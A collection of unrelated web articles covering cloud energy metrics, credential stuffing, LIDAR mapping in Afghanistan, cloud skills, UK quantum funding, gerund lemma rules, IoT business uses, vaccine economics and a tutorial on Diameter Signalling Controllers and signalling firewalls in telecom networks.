Taking care of the IT angle can save energy on the facilities side. Stanley says an organization able to consolidate its workload on half as many servers will spit out half as much heat. Less heat translates into lower air-conditioning requirements.
“When you save energy in IT, you end up saving energy in the facilities side as well,” says Stanley.
But the cloud doesn’t cut energy costs completely on its own. IT managers need to make a conscious effort to realize the cloud’s energy-savings potential, cautions Stanley. He says they should ask themselves whether they are committed to doing more work with fewer servers. They should also question their hardware decisions. An organization consolidating on aging hardware may need to choose more energy-efficient servers in the next hardware refresh cycle, he adds.
In that vein, developments in server technology offer energy-savings possibilities. Today’s Intel Xeon Processor-based servers, for instance, include the ability to “set power consumption and trade off the power consumption level against performance,” according to an Intel article on power management.
This class of servers lets IT managers collect historical power consumption data via standard APIs. This information makes it possible to optimize the loading of power-limited racks, the article notes.
Enterprises determined to wring more power efficiency out of their clouds have a few metrics available to assess their efforts.
Power usage effectiveness, or PUE, is one such metric. The Green Grid, a consortium that pursues resource efficiency in data centers, created PUE to measure how data centers use energy. PUE is calculated by dividing total facility energy use by the amount of power consumed to run IT equipment. The metric aims to provide insight into how much energy is expended on overhead activities, such as cooling.
Roger Tipley, vice president at The Green Grid, said PUE is a good metric for facilities engineers who need to size a data center’s infrastructure appropriately for the IT equipment installed. PUE may be coupled with the PUE Scalability Metric, a tool for assessing how a data center’s infrastructure copes with changes in IT power loads.
Peirce said EMC tracks PUE fairly closely and designed a recently opened data center to deliver a very aggressive PUE number. The highest PUE value is 1.0, which represents 100-percent efficiency. While PUE looks at energy from a facility-wide perspective, data center operators also focus more specifically on hardware utilization. Peirce said utilization is the main metric EMC uses, employing that measure to gauge both cost and energy efficiency.
Stanley says utilization measures can get a bit complicated. A CPU may experience very high utilization, but have no essential business tasks assigned to it.
“Utilization is not necessarily always the same thing as useful work,” he says.
Other hardware-centric metrics include SPECpower_ssj2008 and PAR4. Standard Performance Evaluation Corp.’s SPECpower assesses the “power and performance characteristics of volume server class computers,” according to the company. PAR4, developed by Underwriters Laboratories and Power Assure, is used to measure the power usage of IT equipment.
The various measures can guide enterprises toward energy savings, but making the efficiency grade requires a concerted effort.
“Yes, you can save energy by switching to a private cloud,” says Stanley. “But just saying ‘We are going to switch’ is not enough.” | <urn:uuid:dfd57228-7e6b-4848-a05f-1464348e81be> | CC-MAIN-2022-40 | https://intelligenceinsoftware.com/EnergySavingsintheCloud/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335365.63/warc/CC-MAIN-20220929194230-20220929224230-00118.warc.gz | en | 0.933478 | 1,609 | 2.546875 | 3 |
What is the hacking technique known as ‘Credential Stuffing’?
Hackers used data stolen from less secure sources to access HSBC customers’ bank accounts. Does this mean all our online profiles now need the same level of security as our online banking credentials? How can consumers really know which websites and connections are secure?
Tim Callan, Senior Fellow at Sectigo:
“Credential stuffing” attacks are an example of how broadly information theft can be exploited by sophisticated criminals. Even seemingly innocuous personal details, stolen in a context that appears to be completely devoid of risk for critical information theft, can then be repurposed to gain inappropriate login access somewhere else.
“Consumers should only share information with online parties they know and trust. One of the ways they can be sure of the identity of a web site operator is to look for the company’s name in the browser’s address bar adjacent to the URL. When it appears in the browser this way, you can trust that this information has been authenticated and you’re seeing the actual name of the company that operates this site.” | <urn:uuid:dbbe688e-dd2f-4e5b-99ab-8ca14ec7c621> | CC-MAIN-2022-40 | https://informationsecuritybuzz.com/expert-comments/hsbc-data-breach-and-credential-stuffing/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335530.56/warc/CC-MAIN-20221001035148-20221001065148-00118.warc.gz | en | 0.933115 | 234 | 3.203125 | 3 |
LIDAR's remote sensing technology, which bounces pulsed lasers, produces more accurate maps more quickly than traditional geospatial tools.
Light detection and ranging technology, which has proved invaluable to a variety of domestic mapping projects, is also a potential game-changer in Afghanistan, where troops face some of the world’s most forbidding terrain.
Troop movements are hair-raising, with improvised explosive device attacks so ferocious that broad agency announcements go out for unmanned ground vehicles. Helicopter gunship crews remain vulnerable to shoulder-launched rockets and anti-aircraft fire. Yet until recently, coalition commanders have often relied on dusty Raj-era British terrain maps.
But LIDAR, an optical remote sensing technology, can yield data flows that are orders-of-magnitude quicker, more accurate and clearer than other mapping tools.
Accurate flood mapping is still a work in progress
NASA data lets scientists map forests (and the trees)
LIDAR bounces pulsed lasers, as opposed to the electromagnetic radio waves of radar and sonar, off target objects and surrounding areas of interest to detect their properties. Because it can detect much smaller particles in the atmosphere than radar, which can’t detect things smaller than cloud particles, LIDAR can even be used for aerosol detection.
Some laser radar systems can perform multiple sequential scans over a scene. Others create images in target or mapping modes. In targeting, the sensor continually focuses, saturating a target with laser pulses to generate a high-resolution product. Mapping is wide-area collection, where the laser pans to collect data along a set path.
The National Geospatial-Intelligence Agency (NGA) has been deploying LIDAR in aircraft to map Afghanistan’s entire 647,500 square kilometers. In announcing the ALIRT LIDAR project at the GEOINT 2010 Symposium, Air Force Lt. Gen. John Koziol, director of the Defense Department’s Intelligence, Surveillance and Reconnaissance (ISR) Task Force, heralded the technology’s “amazing capacities” for coverage down to inch-level fidelity.
At that time, a sole Air Force G-3 Gulfstream was involved in NGA's Afghanistan mapping operation, Koziol said. The total number of aircraft ultimately deployed — and nearly the entire program — is classified. But NGA describes its ALIRT LIDAR program as “an airborne 3-D imaging laser radar system optimized for wide-area terrain mapping.” LIDAR mapping was used in the aftermath of Haiti's 2010 earthquake.
In public testimony in March, Defense Advanced Research Projects Agency Director Regina Dugan called LIDAR’s photon-detecting arrays “so sensitive it’s now possible to make range measurements with fewer than 10 photons received, versus tens of thousands,” which means that at times, the technology is capable of locating hidden objects and penetrating tree canopies.
LIDAR can complement, interface with or fuse with conventional maps, tactical computer modeling, full-motion video, hyperspectral imagery and ISR platforms. The Global Positioning System enables the process.
Mathias Kolsch, assistant professor of computer science at the Naval Postgraduate School, helps direct the DOD-backed ISR Task Force at the school’s Remote Sensing Center. Often in consultation with National Security Agency colleagues, he works on LIDAR issues such as anomaly-detection and semantic compression algorithms, computer-vision analysis, and multimedia.
The depth calculation capability of the Afghanistan-mapping technology is a prime attraction for the deployed force, Kolsch said. Mission tasking determines the lasers’ widths and other parameters, but the detection range is from a few centimeters to a meter.
“The most advanced LIDAR sensors for critical depth measurements are called Flash LIDAR, and they do more or less what a flashlight does: send out a big broad pulse of laser light…[with] multiple receivers” for the returns, he said. “Instead of the traditional LIDAR with its single receptor, [these sensors] have a whole detection array — banks of digital [charge-coupled device] cameras — so they simultaneously get multiple depths.”
Current-generation LIDAR can be configured to cover specific structures, vehicles, roadways or terrain. The light it pulses from an aircraft’s sensor can, by some estimates, collect as many as 150,000 data points per second. The data provides location on an X-Y-Z axis, referred to as a point cloud, with millions of individual ground data points.
According to the Naval Postgraduate School, wavelengths range from ultraviolet to visible and infrared, which is at least 1,000 times smaller than radar. By comparison, Canada’s Radarsat satellite has a wavelength of 5.6 cm. Here, smaller is better.
What’s more, satellites are typically a few meters off, Kolsch said. But “with LIDAR-based approaches, you can identify little pebbles on a road — and what’s around them.” Besides discovering military conditions and elevations from 3-D models, the data can be used for detecting change over time to determine whether new buildings have been constructed or roads regraded.
Other mapping modalities being deployed or in late-stage development include the DARPA/Air Force Research Lab’s High Altitude LIDAR Operations Experiment, the Army’s holographic Tactical Battlefield Visualization program, and the Army Geospatial Center’s terrain-charting BuckEye tool, which melds airborne LIDAR with digital color camera imagery.
An NGA imagery scientist, who asked to remain anonymous for security reasons, said that depending on the mission, LIDAR sensors are “bathymetric, topographic and atmospheric…and gather topographic data using different regions of the spectrum.” The resulting data is used to automatically generate high-resolution 3-D digital terrain and elevation models. Overall, the scientist said, LIDAR elevation data supports improved battlefield visualization, line-of-sight analysis and urban warfare planning.
Some research focuses on using LIDAR to perform fully automated feature extractions, 3-D urban modeling and vertical obstruction analysis, the scientist said. LIDAR might eventually perform semi-automated feature extraction and display — for example, for vegetation, buildings and roads. | <urn:uuid:001b628e-160b-4a42-bede-679329085a0f> | CC-MAIN-2022-40 | https://gcn.com/data-analytics/2011/07/laser-based-mapping-tech-a-boost-for-troops-in-afghanistan/283442/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337322.29/warc/CC-MAIN-20221002115028-20221002145028-00118.warc.gz | en | 0.908903 | 1,350 | 3.0625 | 3 |
Top Cloud Skills Employers Look For
Cloud computing refers to the delivery of computing services over a proprietary network or the Internet. Those services mainly include infrastructure (i.e. servers, storage devices, etc.), development platforms, and software applications. The Cloud refers to the many data centers located throughout the world that house the hardware necessary to offer cloud services. The recent proliferation of virtualization technology, on which cloud computing is based, has contributed to its current popularity.
Cloud computing services fall into three categories, Infrastructure-as-a-Service (IaaS), Platform-as-a-Service (PaaS), and Software-as-a-Service (SaaS).
- An IaaS provider satisfies its customers’ needs for computing resources by supplying servers (both physical computers and virtual machines), block storage, networking components and other hardware like firewalls and load balancers. All of these resources across the data center are pooled to provide on-demand access. The service provider may also provide the operating system and some applications with which users build their own customized software images. Ultimately, though, the provider is responsible for the equipment and the customer is responsible for the applications running on the equipment.
- A PaaS provider supplies an environment in which software developers can build and deliver web-based applications and services over the Internet. Once the application is built, it runs on the provider’s servers and is delivered to the users via the Internet. Again, the exact services provided will vary by vendor but all will include tools for design, development, testing, deployment, and hosting. Other support services like developer collaboration and community forums, security, storage, application versioning and more are also likely to be included. Like IaaS, the cost of PaaS is determined by actual usage.
- A SaaS provider hosts software applications and the data stored therein. No part of the software resides on the user’s computer. Rather, users access the software over the Internet and typically pay for it with a subscription. The subscription replaces the need for licenses. The costs of SaaS are minimal considering the amount of functionality and computing resources you get compared to the cost of buying your own software and equipment.
Here are the Top Cloud Skills
- Cloud security: Security was once the main challenge for many companies, but most firms today understand that security can be properly handled in a cloud implementation. New tools such as data loss prevention (DLP) and identity access and management (IAM) are part of a cloud security solution, and IT pros should also help build best practices around process such as procurement and integration.
- Virtualization: Virtual machines have been part of the IT landscape for quite some time but today they are ranked very highly for demand. The fact that virtualization skills are still in demand speaks to the amount of modernization that many companies still need to perform in moving from a static on-premises mindset to a dynamic as-a-service approach.
- Business Continuity/Disaster Recovery (BC/DR): Obviously a top-of-mind topic following the COVID-19 outbreak, BC/DR is a perfect example of a broad process rather than a discrete skill. By understanding the various options available in cloud storage and cloud software, IT pros can build a solid BC/DR plan that helps their organization navigate disruptions.
- Optimization: One of the main benefits of cloud computing is the ability to tailor the infrastructure depending on the application. This is something that not many companies have performed in the past—especially if they have not been exploring virtualization—and it requires IT pros to understand the behavior of applications along with the different characteristics of cloud infrastructure options and cloud providers.
- Private cloud construction: The label “private cloud” is often applied to a wide variety of situations, including any managed infrastructure or even a company’s existing on-prem equipment. As businesses recognize the differences between different models, they may opt to build a true private cloud, requiring the use of software to dynamically allocate resources and self-monitor based on certain parameters.
- Orchestration: A natural result of optimization is a multi-cloud environment, where many different providers and models are utilized in order to achieve the best performance. In this situation, there is a need to ensure all the pieces are working together properly. This is similar to standard data center management, but on a much larger scale.
- Data analysis: Cloud computing affects data analysis in two ways. First, there is an abundance of information generated from cloud operations that must be analyzed for proper orchestration. Second, cloud components offer a pathway for companies to perform more robust data analysis than they ever have in the past.
Most of these skills can apply to IT pros in multiple disciplines. For example, virtualization is obviously a skill needed for infrastructure management, but it is also important for software developers as they work in DevOps environments. Regardless of the career path, being competent with cloud systems will be a must for the years to come. | <urn:uuid:3581f096-2682-4412-a3a9-7b444430cfff> | CC-MAIN-2022-40 | https://intellectualpoint.com/top-cloud-skills-employers-look-for/?highlight=Cloud+Computing | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337322.29/warc/CC-MAIN-20221002115028-20221002145028-00118.warc.gz | en | 0.939181 | 1,026 | 2.75 | 3 |
The UK government has highlighted 38 UK run quantum projects that will receive a share of a £70 million investment that aims to develop technologies ranging from new electric vehicle batteries to advanced imaging systems that detect cancer.
Quantum technologies could potentially bring about technological breakthroughs in the field of cryptography as quantum computers are expected to be exponentially faster than HPC system operating today.
This round of investment will go to 80 companies and 30 university that are working on the 38 quantum projects. Enterprise and universities are collaborating on many of the projects like the University of Manchester which is working with the medical imaging firm Adaptix to develop a sensor that can differentiate between cancers tissues and healthy ones.
UK Research and Innovation Challenge Director Roger McKinlay commented that: “About one third of the projects concern quantum computing, demonstrating that the UK is becoming the go-to place for this game changing technology, with a growing community of thriving spin-outs, led by world-class teams. Quantum computers will be exponentially faster than classical computers at certain kinds of complex problems, solving in seconds what would take the best classical computers thousands of years.”
Larger Quantum Investment
Last year the UK government committed £153 million towards the development of quantum technologies, bringing total investment into the nascent technology to £1 billion. This week’s allocation of funding to the 38 projects is part of that larger investment.
Through the National Quantum Technologies Programme the £153 million is expected to be matched with a £200 million investment from the private sector. Overall the UK government hopes to ‘increase research and development investment to 2.4% of GDP.”
The UK is also establishing a National Quantum Computing Centre, this centre will be delivered by the UK Research and Innovation body which works in collaboration with industry and universities.
At the time of the investment Science Minister Chris Skidmore commented that: “This milestone shows that Quantum is no longer an experimental science for the UK. Investment by government and businesses is paying off, as we become one of the world’s leading nations for quantum science and technologies. Now industry is turning what was once a futuristic pipedream into life-changing products. This is our modern Industrial Strategy in action – taking the most innovative ideas from our world-leading researchers and showing how they can be applied, from diagnosing diseases to detecting gas leaks.” | <urn:uuid:fd8488bd-250d-4e04-9414-2b4381c56346> | CC-MAIN-2022-40 | https://techmonitor.ai/technology/hardware/quantum-investment | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337836.93/warc/CC-MAIN-20221006124156-20221006154156-00118.warc.gz | en | 0.947175 | 478 | 2.5625 | 3 |
When do Gerunds get their own lemma, and when do they get placed under their base lemma?
|Enter as own lemma||Place under base lemma|
|Single words||Gerund has a noun definition of “The act of a".||Gerund does not have a noun definition "The act of a"|
|Multi-word phrases||Base lemma is not a verb.||Base lemma is a verb.|
A gerund is a form that is derived from a verb that functions as a noun. Gerunds are always formed from the present participle form of a verb therefore will always end in –ing.
A lemma is a word or phrase that is glossed; headword.
Gerunds that have a noun definition of “The act of a”, get their own lemma. For example: logging, booking, climbing, etc.
Gerunds that do not have such noun definitions get placed under their base verb form lemma. For example: testing gets placed under test, asking gets placed under ask, etc.
When dealing with multi-word phrases that end in gerunds, we must look at the term as a whole; if we replace the gerund in a phrase with its base verb form, is it still a valid phrase and is the phrase a verb?
If the multi-word base verb phrase is a verb, the multi-word gerund phrase should be placed under its base verb form lemma.
If the multi-word base verb phrase is not a verb, the multi-word gerund phrase should get its own lemma. The multi-word gerund phrase should then get connected to the multi-word base verb phrase in the UCF Term Hierarchy.
Multi-word phrase gerund: security testing
Multi-word phrase base verb: security test
Let’s apply this line of thinking to the gerund phrase security testing. The base verb form of testing is test. So we must look at the base verb phrase security test. Is security test a real phrase? Meaning is this a phrase that is used by multiple sources? Yes.
Second question, is security test a verb? No.
Conclusion: security testing should get its own lemma and be connected to security test via the UCF Term Hierarchy. | <urn:uuid:cb85d26c-414c-4d5b-8960-f12b4ba41cb3> | CC-MAIN-2022-40 | https://support.commoncontrolshub.com/hc/en-us/articles/115003798303-How-do-I-enter-gerunds-into-the-Dictionary- | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030338280.51/warc/CC-MAIN-20221007210452-20221008000452-00118.warc.gz | en | 0.912997 | 544 | 2.71875 | 3 |
IoThings – 5 Vital Methods Startup Companies Should Use it as a tool to fit into the newest trend. First and foremost, the Internet of Things (IoT) simply means our daily objects are now generating data and connecting them to the internet. What is the result? It’s simply more data – a lot more data from the objects. These data humans can make good use of in diverse ways we could not have ever imagined even 20 years ago. Wrist watches can now monitor our sleep at night and keep track of our daily activities, Music speakers and TVs now understand what we say as command, special golf clubs tell its players how to improve their swing, and driverless cars, airplanes or ships make autonomous trips.
Internet of Things (IoT): 5 Essential Ways Every Company Should Use It
At the moment, reports has it that we have about fifteen billion IoT devices. It has been predicted that by 2020, the number will rise to between fifty and seventy billion devices connected to the internet from all over the world. What exactly does this means? It’s simple; the opportunities of how to use these IoT devices and the data they create are limitless. Besides, herein lies the problem: it is far too easy for companies to get astounded and lost by all this happenings.
The questions is; where do these companies start with the IoT – Internet of things? How best can they use the IoT? As a matter of fact, these are just some of the ethical billion-dollar questions about the IoT devices. Regrettably, a lot of organisations are flying on the IoT craze without giving much attention to how this is connected to their business strategy. They do not care about how they could develop the biggest business core value.
Personally, I suggest that every sector should make it an urgency to take some time to determine how it might use the IoT (and the data that it generates) strategically to boost their business to the next level. I read a book written by Bernard Marr which is titled ‘Data Strategy: How To Profit From A World Of Big Data, Analytics And The Internet Of Things’, the author identified the following 5 essential ways companies can make good use of the Internet of Things, which should definitely assist any company to structure their IoT plans and considerations.
Generally speaking, the following are the main uses of the Internet of Things (IoT) in every business:
- Improve decision-making
- Understand customers
- Deliver new customer value propositions
- Improve and optimize operations
- Generate an income and improve the value of the business
Now, I will walk you through their explanation from the beginning till the end. IoThings – Use it.
- Predictions: How to tell which IoT Forecast to Focus on by Next Year
- Internet of Things (IoT) – How Will It Change our World?
1. IoT helps to Improve decision-making
In the first place, I will say the massive amount of new data from IoT sensors and devices simply adds to the huge pool of big data we now have in the world and intellectual companies use that data for operational decision making and to inform strategic plans. More importantly, the tactical decision making is area the high-ranking leadership team identifies the critical questions it needs replying. Working decision-making is the area where analytics and data are made available to everybody in the company. It is often done through a self-service tool, to inform data-driven decision at all levels.
2. With IoT, Business will Better understand customers
From the look of things, many more production companies manufacture IoT-enabled products which helps them to connect directly to their customers’ preferences and behaviours. Take for example, Fitbit activities tracker wrist watch knows what our normal sleeping patterns are and how much we all do exercise. The popular Samsung can easily collect customer usage data from their smart TVs which we buy. Kone, an Elevator manufacturer is using IoT data to learn how their customers are using their elevators in buildings.
Also Rolls Royce company knows how local and international airlines use the jet engines they produce. On the other hand, even companies that don’t manufacture IoT devices can regularly gain access to data from other people’s devices via the internet. In fact, just think about app developers that are able to collect user data (cookies) because of the data collection and connectivity capabilities of the smart phones or tablets that run their apps. Furthermore, when Internet of Things (IoT) is used appropriately, a lot of companies can influence these insights to make faster and better business decisions. By accumulating the data, experts can look for new trends and isolate new business prospects.
3. Using IoT can Deliver new customer value propositions
As for me, I believe that a step further from using IoT devices to better understand customers is to make them part of your contribution. As an illustration, tractor and farm equipment maker John Deere makes use of the IoT in several different ways to offer innovative and new products and services to their farmer clients. These innovations ranges from self-driving tractors and trucks, intelligent farming solutions where sensors constantly monitor crop levels and soil health and give famers advice on what specific fertilizer to use in a specific land area and what crops to plant in there.
4. Businesses can Improve and optimize operations using IoT
Do you know that the data generated from all the IoT devices can also be used to improve the ways different companies are run? Similarly, it can help to automate factories and improve the efficacy of internal procedures. The Uber mobile app, which is a smartphone app-based ride booking service that connects passengers who need to get a location with drivers, developed algorithms that use data from sensors and smart phones to observe traffic conditions and journeys in real-time.
More importantly, not only does this real-time data help the Uber Company to regulate its trip fare cost based on demand, it also helps manage the supply of drivers. When drivers see that demand is low from the app analytics, they will stay home. On the other hand, they will head out to offer their driving services when they see that the demand is high to meet the demand. Likewise, Rolls-Royce is another great example.
The company‘s manufacturing systems are networked in an IoT environment. Online reports has it that at their factory in Singapore, they generates half a terabyte of manufacturing data on each individual fan blade they produce. After gathering these data, they use it for quality control purposes, a precarious area for success for their organization.
5. IoT can help to make more income and improve the value of the business
If you are not aware, it’s important that you know that the data and insights our IoT devices generate are often very valuable to some companies. In the light of this, the most direct way to appreciate this value is by selling the data or insights to other companies. The Google’s Nest is a perfect sample. Google’s Nest is collecting real-time energy usage data from its consumers and is now able to sell these insights to interested parties and other utility companies.
Apart from the direct income, data and a company’s ability to use it is one of the most significant assets of present companies. Keep in mind that data is a business asset that is just as serious, if not more critical, to manage and account for as you would for other assets such as inventory and human capital. Therefore, whether your data assets just support the bottom line of your organizational worth or you find other individuals willing to pay you for access to the data you collect, companies are finding extra value streams because of their data.
In final words, the Internet of Things (IoT) developments are not going to slow down anytime soon, but the faster your company develops and implements a new strategy, the more secure your company’s future will be in years to come. | <urn:uuid:b258b87d-b853-4035-a93e-ba6bb2e1acb2> | CC-MAIN-2022-40 | https://hybridcloudtech.com/iothings-5-vital-methods-startup-companies-should-use-it/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334992.20/warc/CC-MAIN-20220927064738-20220927094738-00319.warc.gz | en | 0.944905 | 1,621 | 2.59375 | 3 |
And the economics of vaccines – 20% IRR and 2 million deaths averted for the Global Alliance for Vaccines and Immunisation (GAVI) – a multi-organizational collaboration lasting 15-years worth $13B:
Vaccinations are a case study of “The Tragedy of the Commons” – where anti-vaxxers become free-riders putting their self-interest over the common good. The Hastings Center explains this problem very well:
“…To understand why, think of vaccination and the quest for herd immunity as a collective action problem. Garrett Hardin’s “tragedy of the commons” illustrates the basic logic of collective action problems. Imagine that 50 farmers share common land (“the commons”) upon which they graze their sheep. The commons are lush, and so each farmer can easily allow four sheep to graze at a given time without depleting the resource. But imagine that each farmer seeks to maximize his own good (what economic theory refers to as “rational” behavior) and it is better for him to graze more sheep than fewer. The farmers will, in effect, be “free-riding” – in this case, taking more than their fair share of the common resource while benefitting from the restraint of others. The trouble is that, while adding one more sheep to the commons does not deplete the resource, adding 50 does. The combined actions of each farmer, acting rationally, leads to an outcome that is worse for all.
The tragedy of the commons reveals that what is good for the individual is at odds with what is good for all. This is the basic logic of collective action problems. We see a similar logic in the case of vaccines. If most get vaccinated, then everyone will be better off. But it would be best for any particular individual if all others got vaccinated and he or she did not. That way, the individual could enjoy the benefits of the common good (herd immunity) without bearing any of the costs (e.g., risk of possible side effects or complications associated with vaccine). This, again, is a free-rider temptation. The trouble is that if everyone thought that way, no one would become vaccinated and everyone would be at risk of falling ill.
From this perspective, anti-vaxxers are not ill-informed parents with distorted views of what is in their child’s best interest. They are acting perfectly rationally. The trouble is that there are enough of them to generate the tragedy of the commons. Hence, vaccination levels drop and measles rates rise. …” | <urn:uuid:4b40f54b-443c-4dbb-bb15-029e45700c97> | CC-MAIN-2022-40 | https://www.textor.ca/cr-publishes-much-needed-myths-and-facts-about-vaccines-for-children/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334992.20/warc/CC-MAIN-20220927064738-20220927094738-00319.warc.gz | en | 0.948183 | 578 | 3 | 3 |
Hi. This is Chuck Wesley-James, from Cellusys.In this presentation, we are going to look at Diameter Signalling Controllers (DSCs) and what they do in a Telecom network.
We are going to make the assumption that you have some knowledge of the SS7 network, so that we can compare the Diameter Network with SS7.
Let’s take a look at some protocols involved. In 2G and 3G core networks, we used SS7 and two sub-protocols called ISUP and TCAP. In LTE or 4G, the core network is called an IMS network, and the ISUP and TCAP have been replaced by SIP and Diameter.
ISUP did the job of setting up the phone call. It made the far-end ring and set up the circuit switches. In the IMS network that job has been moved over to a protocol called SIP (Session and Initiation Protocol). You’ll be using that if you’re doing voice over LTE (VoLTE)
Now back on the 2G and 3G side, TCAP took care of a little higher level of a control. It dealt with getting you authenticated onto the cell phone network. It determined if you could roam and what services you to have. That protocol has been displaced by Diameter, so in the LTE/4G network, you will have Diameter doing the same functionality.
A few more details….
4G or LTE really has two backend networks: EPC and IMS, but that distinction isn’t needed in this short video. The EPC and IMS make use of two key signaling protocols in the core network:
- Session Initiation Protocol (SIP) used within the IMS for setting up sessions.
- Diameter used in both EPC and IMS for transactional events (requesting information).
Diameter is an IETF defined protocol originally designed for Authentication, Authorization, and Accounting (AAA) as an improvement over a protocol called RADIUS. Diameter improved on RADIUS by supporting:
- Improved failure handling
- More reliable message delivery
- Bigger information elements
- Improved security
- More flexible discovery of other nodes.
These are the interfaces that are using the IMS/EPC core network. For each of these interfaces, the diagram gives the network elements in the EPC/IMS network and labels the interfaces between them.
Rather than referring to an interface as between the HSS and the SGSN, we call it the S6a interface. It is sort of confusing to have to memorize these names, but that is what the industry uses.
Let’s take a look at a few of these interfaces:
Gy and Gx interfaces are a little special, they’re kind of unusual, and there’s a whole video on those, along with S6a. https://www.youtube.com/watch?v=8YCufy6nW-8
If you’re roaming then the S9 and the S6d interfaces are pretty important.
Let’s face it: This diagram is pretty complicated, there’s a lot of connections and we’ve even simplified this diagram because really in your network you’re going to have a whole lot of MMEs. This is why you want to start looking at having Diameter Signaling Controller. It simplifies all these connections.
Next, let’s take a look at why you want to simplify these connections.
Leaving the previous complicated diagram, let’s take a look at the purpose of the DSC or a Diameter Signalling Controller.
If you don’t have a DSC you are going to end up with a network shown on the left-hand side. It’s actually going to be even more complicated than this; it’s a mesh network. That means pretty well everything has to get connected to pretty well everything else. If you were to add a new HSS on to this diagram you’d have to have every MME connect to that new HSS. This is an Operations nightmare.
There’s just far too many connections to maintain. It also means you’ve probably got very little security on here and you certainly have no one place to go to take a look at where the traffic is flowing and how much. It is pretty hard to tell if too much traffic is taking place or if one node is carrying too much traffic. It also means you probably can’t connect to another carrier for roaming because you certainly wouldn’t want other carriers connecting directly to your HSS and directly to your PCRF.
It also means in this you’ve got a terrible network to troubleshoot.
- Operations nightmare
- Far too many connections
- New HSS implies modifying every MME
- No Security or Central Traffic view
- Terrible Troubleshooting
You need a central place to mange your network, which is what a DSC is going to do for you.
So let’s simplify this mesh network, by putting DSC in the middle. If you come from SS7 background that DSC looks a lot like an SS7 STP. In SS7, the STP takes all the messages decides where to route them and send them out again. This is done in a hub-and-spoke architecture just like we’re showing here.
Like an STP or even an IP router, the DSC, turns a mesh network into a hub an spoke pattern.
This means that
- One place to make connections. For example, a new HSS node requires only one connection, saving you doing a modification in every MME
- One place for value-added processing like Signaling Firewalls or Billing
- One place for external entities to access your network – a DEA…. You would not want another operator connecting to your MME…. Especially not hundreds of other operators.
- One place for troubleshooting
Let’s take a look at the main functions of the DSC, and what people are going to be talking about.
Relay or Proxy Agent:
If you started learning about the DSC from the standards, you would have read about the relay or proxy agent. It is the base definition of a DSC. When a message comes into the DSC, it’s going to be from some node like an MME or HSS, and it is going to be sent to another node like a HSS or PCRF.
Most of the messages actually have a destination host and a destination realm, so the DSC’s job is pretty darned easy.
The difference between relay and proxy is simply that a proxy is allowed to change the message somewhat, but when you’re out shopping for a DSC that’s not going to come up in conversation: any decent DSC is going to be able to both Relay and Proxy functions.
A Diameter Routing Agent (DRA) is something else, and it can be pretty expensive, so let’s be sure of what we are talking about.
If you look at the standards for a DRA, you will see it is NOT a Core Router. It is something that specifically sits in front of a group of PCRFs. We tend to get lazy we talk about DRA’s as core routers, doing what we described in the Relays and Proxys, but the strict definition of the DRA is only in front of PCRFs.
A DRA routes messages to specific PCRFs based on something called an IPCAN session. (Here is a video that goes in to more detail on DRAs and IPCAN sessions: https://www.youtube.com/watch?v=8YCufy6nW-8 . ) Depending on the smarts contained within your PCRF, you might not need a DRA. If your PCRF is running hot standby or multiple PCRF nodes are sharing the IPCAN session data you likely don’t need this functionality.
DRA functionality tends to be expense, so ensure you actually need one before you go buy one. Otherwise stick to the basic DSC functions.
The Diameter Edge Agent (DEA), is a basic function of most DRAs, just like Relay/Proxy, but it does have more smarts.
The Diameter Edge Agent is the place where other carriers are going to connect. You don’t want other carriers to connect their MMEs and other nodes directly to your nodes. Operationally – it’s a mess. Security wise – it’s a complete mess.
So the Diameter Edge Agent’s job is to let the other carriers access your network functions in a controlled manner and to do some basic security. In the SS7 world, this would be called Network Gateway STP. Commonly carriers have one STP doing internal routing and acting as the Network Gateway. Similarly the DSC can also do internal routing and act as the DEA.
There are a couple other functions you might hear about.
The Interworking Function (IWF), which is typically between SS7 and Diameter. You might hear about it, but the commercial use cases for this are not great. There are not a lot of IWFs in the real world. If you carefully go through the use cases, and the functionality required in your SGSN and/or HLR, you will probably find won’t need this in your network.
The Subscriber Location Function (SLF) is a diameter proxy agent or relay agent, which looks up list of subscribers in your network and then determines where it’s going to send the message. You might need this if got an HSS and you’ve got so many subscribers you have to divide it to multiple HSSs: Here an SLF will help.
SLF functionality is really only used by the absolute largest carriers. They have huge number of subscribers, forcing them to use and SLF. But if you are a smaller carrier and you don’t need to maintain this extra list of subscribers on the SLF then don’t do it.
Let’s get back to the Diameter Edge Agent (DEA), because it’s pretty important.
A Diameter Edge Agent often works with a Signalling Firewall. A DEA typically has some security built into it, but security functions are going to get much more in depth when you work together with a Signalling Firewall.
The Signalling Firewall can sit directly on the Diameter links, or it can be a value-added feature on top of a DEA.
The DEA takes care of basic message routing. It knows about destination hosts, destination realms and routes messages. It can do some things like topology hiding. (If you’ve seen my other videos, you will know, I’m not too impressed with Topology Hiding as a security feature. https://www.youtube.com/watch?v=wRYetUZgdqU ) The DEA will take care of things like IPSec and DTLS to secure those connections and understand who they are. The DEA deals with that nodal connectivity. That’s its job, it’s a DSC at heart.
If you are using the Signalling Firewall as a value added feature on the DEA, then we want the DEA to do is to send a subset of traffic to the Signalling Firewall. We want the DEA to send any of the traffic that’s going to come into your network, because that is traffic upon which, we want the Signalling Firewall to do some extra checks. Maybe the messages that are going between your own MMEs and your own HSS you don’t want to send to the Signalling Firewall or you just want to check for throttling to make sure they’re not sending too much traffic.
So you’ve got a lot of traffic choices you can make and the DEA is going to be able to determine which messages will go to the Signalling Firewall.
Let’s take a look at the Signalling Firewall and what it is doing.
The Signalling Firewall is one central place for all the security rules about what messages are going pass through your network.
You could have some rules for this in the DEA, some in the HSS, and some in the PCRF, but when you come to troubleshoot your network, or question why a given message was allowed through, you have a head ache. When you come to troubleshooting, to determine why you have blocked a message you would have to look in four different places. That’s not good.
The Signalling Firewall should be the central place for all the rules. It needs to be able to provide some pretty exacting reporting and logging of what messages it drops and for what reasons. It is also one central place for all the protocols, because we know diameter is not the only protocol on your network. You’re probably also running SS7, maybe SMPP for your SMS messages and GTP. You can use the Signalling Firewall to act for all those protocols at one time, using the same database.
This will allow you to do per country and per carrier analysis and much better, because it’s one central place to look at all the data, regardless of what protocol was used.
